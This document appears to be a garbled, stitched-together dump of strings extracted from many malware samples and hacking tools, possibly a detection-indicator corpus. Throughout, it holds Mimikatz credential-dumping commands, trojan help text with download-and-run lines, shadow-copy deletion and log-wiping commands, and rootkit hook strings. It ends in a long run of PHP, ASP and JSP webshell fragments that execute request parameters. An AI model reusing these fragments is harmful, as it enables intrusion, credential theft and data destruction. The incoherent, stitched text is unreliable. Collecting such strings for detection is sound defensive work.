Unavailable connect to %s mssql server success. type command at prompt.;database=masterselect * from openrowset('sqloledb','trusted_connection=yes;data source=myserversekurlsa::msvsekurlsa::wdigestsekurlsa::kerberossekurlsa::tspkgsekurlsa::livesspsekurlsa::sspsekurlsa::processekurlsa::minidumpsekurlsa::pthsekurlsa::ticketssekurlsa::ekeyssekurlsa::dpapisekurlsa::credmancryptprimitives.pdbnow is t1oalice123bobby456
Unavailable d$$e
Unavailable ofa8
Unavailable restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
Unavailable ++[%s^^unknown^^%s]++vtfs43/emm3
Unavailable zo4)
Unavailable )zka^
Unavailable k2dq
Unavailable j4lc
Unavailable o6))
Unavailable qzy
Unavailable @uatauavawh
Unavailable p32.sysunilay.dlli
Unavailable fd9,au
Unavailable ai44
Unavailable @z(i
Unavailable ":-,
Unavailable \$ph
Unavailable il+/
Unavailable y)gd
Unavailable <0t|
Unavailable 4@_$
Unavailable f+q.
Unavailable %1r{u"
Unavailable \!gq01wb
Unavailable `*^t.qi
Unavailable f=&l
Unavailable t01wb
Unavailable (.?/$
Unavailable "rvy
Unavailable bb;^=
Unavailable getsystemdirectorygetwindowsdirectoryisbadreadptrisbadwriteptrurldownloadtofile{\\field{\\*\\fldinst { includepicture.php?id=\\\\* mergeformat \\\\d}}{\\fldrslt}}userformuserloginforminvalid username or passwordpostupload_
Unavailable $.,$
Unavailable j+%gt
Unavailable qux{
Unavailable js01wb
Unavailable t6,{
Unavailable %w0*o
Unavailable f*bpe
Unavailable &dfl
Unavailable zfogh
Unavailable 5b!m
Unavailable s"c<
Unavailable 0/cd
Unavailable this is up007getallbaseinfomessageloopzxcvfdsa#$%@mnbkjhuy@#$%wert
Unavailable httpf
Unavailable v^pl
Unavailable vhqyf
Unavailable muhu8b
Unavailable gr5(&
Unavailable tpu0
Unavailable gd:\>
Unavailable 8czi
Unavailable <a href=\"http://www.xfocus.net\">x-scan</a>report-analysis-of-host\\\\localhostiis.run>could not connecto %sn
Unavailable ;-sgr
Unavailable jbcyreg43lerjf893jhbdgfluh8e9849jfmd39lieux8f8loiuyc540iqixcm589y8943p209ifhw84hgdoi2d9slvsysshell.lnk060501080505070400060304n
Unavailable jx01wb
Unavailable !5_|
Unavailable .m^9
Unavailable exampleproject.dll
Unavailable o%k[}
Unavailable !'p~
Unavailable &sgw
Unavailable 9-au
Unavailable watcom c/c++32 run-t
Unavailable l$8@
Unavailable \/hh
Unavailable d$,pv
Unavailable shell3all.cisdebug.dlls
Unavailable tcs9
Unavailable _^[y]
Unavailable %s -r debug 1\\\\.\\keymmdrv1wnyglwboazdcdwayflwcodetabl/c del %s >> nul%s%s.manifestspideragent.exeavgidsagent.exekavsvc.exemspaint.exekav.exeavp.exenav.exeglobal\\rundll32exitevent_name{12845-8654-543}\
Unavailable u:h+
Unavailable 6_|/
Unavailable t$4i
Unavailable $801wb
Unavailable i|6m.
Unavailable user-agent: netscapea
Unavailable eventunregister
Unavailable -9gymh
Unavailable hlv
Unavailable |01wb
Unavailable %d -- %stimeout while waiting for ack block %d. file <%s>tftpportttftpd32backgroundsoftware\\tftpd32e
Unavailable .avh
Unavailable i)8*f
Unavailable \j9=
Unavailable f1cvby
Unavailable 9q;1
Unavailable n(hhz
Unavailable >>j_!
Unavailable vwav
Unavailable ]~ym
Unavailable setsystemtimeadjustment\\payload\\payload.x86.pdbu
Unavailable [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
Unavailable esps
Unavailable wpa'
Unavailable fd9 t
Unavailable eiq\
Unavailable .?avpairnode@@
Unavailable 01wb
Unavailable tyy;
Unavailable o9cy
Unavailable vqsrv
Unavailable a_a^a]a\_
Unavailable lame3.99.5
Unavailable pppsqrv
Unavailable (d$
Unavailable psqrvh
Unavailable j" $
Unavailable e$9?(
Unavailable $n_.
Unavailable fcf>`z
Unavailable t$pl
Unavailable "tj5
Unavailable ugly.gorilla1ndisimcopysendcompleteperpacketinfondisreenumerateprotocolbindingsndisopenprotocolconfigurationsetsecuritydescriptorsaclcomparestringagetcommandlinews
Unavailable july
Unavailable pojx
Unavailable f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtchatudpfloodbolonyoktedonadoninyse.comnysearca_listing_fees.pdfbf13-5d45cb40backup.zipupdates.txtvdirs.datdefault.datmime.datftpurlscreencapturecapturemousei
Unavailable d8v*
Unavailable 5(666z6c6wlm;y%ud%d;1;9;@;g;n;u;\\;c;j;q;x;8 8'8.858<8c8j8q8x8_8f8m8t82 2,282=2b2g2p2u2z2_2h2s2x24'5.555<5c5j5q5x5_5f5m5t5{50#0*01080?0f0m0t0[0b0i0p0w06$6,616=6b6g6s6x6]6i6n6s6=\"=)=0=7=>=e=l=s=z=a=h=6&6-646;6b6i6p6w6^6e6l6s6z6o.qrh@>\">/>4>a>f>s>x>e>j>w>|>0#0(040=0b0n0t0y0e0k0p0|05)5/545@5f5k5w5`5e5q5w5|5=!=&=3=8=e=n=s=`=e=s=x=}=:(:/:6:=:d:k:r:y:`:g:n:u:|:7\"727<7f7m7w7a7k7u72+21262e2k2p2\\2h2m2|2;/;5;:;g;v;\\;a;n;};;\";-;8;c;n;^;i;t;
Unavailable $"*j6
Unavailable \$hh
Unavailable (z>uo>hf
Unavailable corrupt data!
Unavailable v(fk
Unavailable =u2v
Unavailable kand
Unavailable h4[c
Unavailable x uavawh
Unavailable w_yf
Unavailable d00dc
Unavailable ee0r
Unavailable 200dcb
Unavailable `vtordispex{
Unavailable p uh
Unavailable n%d (!=0),user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
Unavailable 2@~~ub
Unavailable u8\&
Unavailable ecuk0
Unavailable ?nz(
Unavailable s0<f
Unavailable otxn
Unavailable \5e`
Unavailable fv8g
Unavailable |$`m
Unavailable .g,*sx
Unavailable pi32&
Unavailable .kfh
Unavailable s9j#
Unavailable xax1
Unavailable yfr+
Unavailable ;0!&
Unavailable j_/<
Unavailable n_2#
Unavailable -aaf
Unavailable mini (c) v1.01 by albert sen 1992`
Unavailable f:\\projects\\bot\\bot\\release\\ism.pdbc
Unavailable d$@l
Unavailable 9*w'
Unavailable d$ph+
Unavailable pron
Unavailable bs/rt
Unavailable y5skxx
Unavailable :i';
Unavailable !pgf
Unavailable ) -%s-> %s (c
Unavailable stack memory corruption
Unavailable rundll32_exec.dll\x00update
Unavailable lwp7
Unavailable :s}n
Unavailable if@f
Unavailable scrm6
Unavailable 6yz2
Unavailable prfembeddedcode
Unavailable 5pw<
Unavailable @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
Unavailable \"2t
Unavailable /tgx01wb
Unavailable reib
Unavailable ul}u
Unavailable 'xy$>
Unavailable http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
Unavailable gl%8
Unavailable o5le9hi
Unavailable g,|2
Unavailable clientpath=serverpath=mz
Unavailable 8l]^
Unavailable (l90
Unavailable p's]
Unavailable gzgl
Unavailable hr&@g
Unavailable ]e:$
Unavailable or}c
Unavailable uecc
Unavailable noobyprotect se 1.1.6.0kaot\
Unavailable ;6c"
Unavailable b8xf
Unavailable \z?tj
Unavailable cp:b
Unavailable l$0f
Unavailable d0lf
Unavailable ogms7
Unavailable 8a,dj
Unavailable ksqlr
Unavailable \$ wh
Unavailable orn>s
Unavailable ftfp
Unavailable new[]
Unavailable w5l"~
Unavailable yxvcg
Unavailable }5ng
Unavailable (0 f
Unavailable vpdn_lu.exeutpnipcn.dll.urlutldvpreg.exeut
Unavailable xfhx
Unavailable ]"`[
Unavailable 1huw
Unavailable g(wf
Unavailable ~*0~y
Unavailable redleavescmdsimulatormutexm
Unavailable "yd!
Unavailable jon8,
Unavailable ^ke>
Unavailable $'oa
Unavailable |$^.u
Unavailable jiro
Unavailable d$4w
Unavailable memory not enough$
Unavailable -v@'
Unavailable 7bi^
Unavailable -<d3
Unavailable /c*ls
Unavailable mli@
Unavailable |$hh
Unavailable ,pj1
Unavailable @3r`0
Unavailable ;/stpo
Unavailable #fwc9
Unavailable gethashcodeactivatorop_equalityd
Unavailable -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
Unavailable vhb2
Unavailable 2/{#-
Unavailable =bxr
Unavailable isvalidlocalename
Unavailable -0"p
Unavailable $tpd]
Unavailable x.&>
Unavailable navlu.dll.urlutpnipcn.dllut\\ssonsvr.exe
Unavailable hpwc
Unavailable on n4
Unavailable software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
Unavailable d$@3
Unavailable emnm
Unavailable iv\\smsswinstationapiport
Unavailable 4,3k
Unavailable protected:
Unavailable -l*>0
Unavailable ,...
Unavailable advapi32.dllversion.dllwsock32.dllcomctl32.dlloleaut32.dllgetfileversioninfoaimagelist_addactivatekeyboardlayoutb
Unavailable c!@i#%vjsieotqwpvz034vuabaiseo%$2fas9vqsfvx%$1.2.7.f-hanba-win64-v1md %s&copy %s\\*.* %s%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing t%s %d \"%s\"ge.tvol. .umein..for mati.onw
Unavailable enddialog
Unavailable |guvp
Unavailable !d$8i
Unavailable l$0l
Unavailable h:\\prj2012\\zxapp-console\\remotedesktop\\releasetest\\remotedesktop.pdbtransfile -get http://x.x.x.x/a.exe c:\\a.exe -run (launch it after downloading completed.)sendfirstscreen size=%d ret=%d.zxplug -add getxxx c:\\xyz.dll -fromurl http://x.x.x/x.dll [+]hook kifastcallentry success[+]initsystemcallentry success[+]driver communication success[-]driver communication failurehidedriverfromobjectdirectory okhidedriverfrompsloadedmodulelist okpacth_kedelayexecutionthread is 0x%xpacth_exallocatepoolwithtag is 0x%xpacth_exallocatepool is 0x%xh:\\kernel\\sshell\\systemcallentry.c!!attack:%wzh:\\kernel\\sshell\\killprocess.ch:\\kernel\\sshell\\objchk_win7_x86\\i386\\usbhpms.pdb= %wz----%d----%d---%d[zxconfig]myip=port=banner=backconnect=
Unavailable \\users\\*\\roaming\\mozilla\\firefox\\profiles\\*\\documents and settings\\*%
Unavailable m7z@
Unavailable epl+
Unavailable y7vv
Unavailable etpu9
Unavailable out of memory.
Unavailable %y7"n
Unavailable turbo pascal desktop
Unavailable x264 - core 148 - h.264/mpeg-4 avc codec - copyleft 2003-2015 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=2 psy=1 psy_rd=1.00:0.00 mixed_ref=0 me_range=16 chroma_me=1 trellis=0 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=0 threads=7 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=1 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=10 rc=crf mbtree=1 crf=24.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00
Unavailable uhl6
Unavailable }&91
Unavailable rrrrrrrw
Unavailable lemk
Unavailable kerne
Unavailable sizeofresource
Unavailable /@cv&j
Unavailable |$(h
Unavailable .i./
Unavailable 8/"-
Unavailable o>}+
Unavailable v+s7
Unavailable t"fa
Unavailable \source\churraskito\release\churraskito.pdb
Unavailable dw^w
Unavailable /|uo
Unavailable _zmtm
Unavailable ar:5
Unavailable 00dcc
Unavailable svcer011.tmp
Unavailable f&&f
Unavailable )dge&`m
Unavailable [iis7up]-->could not connect to %s[iis7up]-->couldn't create pipe[iis7up]-->error impersonating pipe[iis7up]-->couldn't get token[iis7up]-->got system token...[iis7up]-->command: %s[iis7up]-->this exploit gives you a local system shell [iis7up]-->usage: iis7up.exe \"command\" [iis7up]-->no command,use whoami [iis7up]-->changing registry values...[iis7up]-->couldn't set registry values[iis7up]-->restoring default registry values...d:\project\
Unavailable w{z`qz`9xqzs`|.4$
Unavailable jg[*0'r
Unavailable (db(
Unavailable s!9(p
Unavailable 6w!do4^
Unavailable h\--g
Unavailable _-n5%?#az\
Unavailable d$pf
Unavailable 8@t`
Unavailable 3dz -
Unavailable j\elw
Unavailable ]u`@j
Unavailable ^s*
Unavailable pex (c) by bart^crackpl beta release
Unavailable ]f.0a
Unavailable a0"v
Unavailable <#hk
Unavailable iiz}0
Unavailable &dxkd
Unavailable @?c;
Unavailable h0zw
Unavailable http://arm.533.nettftpd32.hlptimeouts and ports should be numerical and can not be 0t
Unavailable 9l~d
Unavailable fbk\
Unavailable writeprocessmemory
Unavailable vb5w
Unavailable strstr
Unavailable }(je
Unavailable a7m4*
Unavailable locatexstatefeature
Unavailable a]_^
Unavailable b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
Unavailable gos2},
Unavailable qj{t{
Unavailable us;b
Unavailable 3("v
Unavailable yq,]
Unavailable ;-sfq
Unavailable h<yc
Unavailable /dev/pts/4/tmp/1408.logshareimagepathzwunloaddriverzwloaddriver/s /u_time64pcc_cmd_packetpcc_basemodpcc_syspcc_processpcc_filebcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8g5\\device\\-%s-%04dfal2.03xxxxxxxxxxxxxxx
Unavailable k&66p
Unavailable ]ohg
Unavailable messageboxw
Unavailable %y|i
Unavailable k`a`ddi`hllb
Unavailable tpu5
Unavailable t?e3
Unavailable r}3>
Unavailable zs[n
Unavailable "\\dump-%u.dmp-----groups/users organizational-----[%s]-----group [%s] members----- [%s]-----users currently logged on----- [%s]netremotetod: 0x%08x
Unavailable <`.g
Unavailable d$@i
Unavailable 7& f
Unavailable }]39)
Unavailable q00dc"
Unavailable dl0k
Unavailable xxge98
Unavailable \\projects\\c#\\sayad\\source\\client\\bin\\x86\\debug\\client.pdbc
Unavailable knc:
Unavailable ek){2
Unavailable asts
Unavailable 3}qwk#
Unavailable /[@zn
Unavailable ;*xh
Unavailable tuesday
Unavailable pebylmo
Unavailable kc d
Unavailable f[!}
Unavailable 0azi
Unavailable lrk2
Unavailable vx*ir=
Unavailable ,u9h
Unavailable cdl,
Unavailable @pppppw
Unavailable kv7%u^
Unavailable )t=6
Unavailable n!o-
Unavailable tcgr
Unavailable %{_g
Unavailable c:\\users\\helloworld\\eorvhjdqgohvsulqwiphpvhwphpfsbtactxcihlpthxaudioentrycannot judge proxy is availabel or not!open reg for proxyinfo fails!inhp://d=
Unavailable qp<5c
Unavailable z:zqu t
Unavailable h@ks
Unavailable 50e@
Unavailable r&#db
Unavailable gh<|6a
Unavailable ze#-y
Unavailable x}~t
Unavailable 4c kd
Unavailable \m\k
Unavailable pbik
Unavailable user-agent: mozilla/5.0 (windows; u; windows nt 5.1; zh-en; rv:1.7.12) gecko/20100719 firefox/1.0.7%
Unavailable "9}j3
Unavailable `|"'
Unavailable 8?ti
Unavailable }"=+.
Unavailable wb7b
Unavailable wbgcat*2
Unavailable xshareware-version exestealth, contact support@webtoolmaster.com - www.webtoolmaster
Unavailable rmjr
Unavailable qrwpq
Unavailable c-nsin
Unavailable ,0abi
Unavailable xsh(
Unavailable tv32
Unavailable \a#c
Unavailable 5mff^
Unavailable october
Unavailable "*m>9,stack = 0x%x, targ_addr = 0x%xexecl failedhiding complit...nusage: %s <username> <fixthings> [hostname]ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmperror: unlinking tmp wtmp file.usage: wipe [ u|w|l|a ] ...options...erase acct entries on tty : wipe a [username] [tty]alter lastlog entry : wipe l [username] [tty] [time] [host]%%appdata%%\\microsoft\\wuauclt\\wuauclt.datmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&sid=%%duser-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sp q%%d)cookies: useid=kgioodaook%%s<!--
Unavailable xde}
Unavailable xh`f
Unavailable stackwalk64privhead\\\\.\\physicaldrive%dcreatenamedpipewsetsecuritydescriptordaclgetoverlappedresultterminatethread%
Unavailable ulsk
Unavailable ?p?h
Unavailable i+.h
Unavailable $fareg$enc=
Unavailable .v,@tu
Unavailable i96tn
Unavailable t&dx
Unavailable d$(a_
Unavailable l$1a
Unavailable e[~j%
Unavailable 3;v(tf
Unavailable =imb;d
Unavailable fev,
Unavailable 5,mv
Unavailable uyvy
Unavailable uvwh0
Unavailable `omni callsig'
Unavailable ^uj~
Unavailable -%pr
Unavailable up@@
Unavailable creative voice file
Unavailable hkeaddsystemservicetablehpsdereferenceprimarytokenc
Unavailable .ae/!
Unavailable <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestversion='1.0'>
Unavailable ?~6.<
Unavailable geyr
Unavailable wevtutil clear-logvssadmin delete shadowsaglobal\\23d1a259-88fa-41df-935f-cae523bab8e6global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9awu3
Unavailable >*%u
Unavailable kwindows
Unavailable 5pe@
Unavailable x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllsystem\\currentcontrolset\\services\\usbstor\\enumsystem\\currentcontrolset\\services\\partmgr\\enum\\agentcpd.dllagentcpd.dllpadupdate.exedll_installer.dll\\restore\\q:\\__?__.lnksoftware\\microsoft\\msnetmng\\shelldoc.dllfile size = %d bytes\\msagentglobal\\rpcmutexglobal\\directmarketingnls_933w.dllb
Unavailable spxll[;
Unavailable |rmb
Unavailable nco&bb
Unavailable &"5z
Unavailable ab00dc}
Unavailable c=retstr(x) = chr( asc(mid(str,x,1)) - asc(mid(key,pos,1)) )fso.buildpath( wshshell.expandenvironmentstrings(a), nn)
Unavailable zh$fr
Unavailable miul
Unavailable q3w!
Unavailable ft#+
Unavailable 20+u
Unavailable yhj{
Unavailable (4h"
Unavailable x4@_[
Unavailable pvsw
Unavailable 7ue%d
Unavailable cm+1<
Unavailable ]a-t
Unavailable j _s,
Unavailable cookie: sn=\
Unavailable -u%:|27^
Unavailable vnwm
Unavailable <htr<jtb<lt6<tt&<wt
Unavailable dddu
Unavailable d$\m
Unavailable oy8(
Unavailable m00dcm
Unavailable 1a6q
Unavailable /brgl
Unavailable s.ng
Unavailable r_m\
Unavailable o+xs
Unavailable s09_v
Unavailable fa96tdh
Unavailable 2nf6
Unavailable \suvw
Unavailable }r=h
Unavailable (-s.
Unavailable t$ h
value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . 
$_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' 
- antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? 
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif 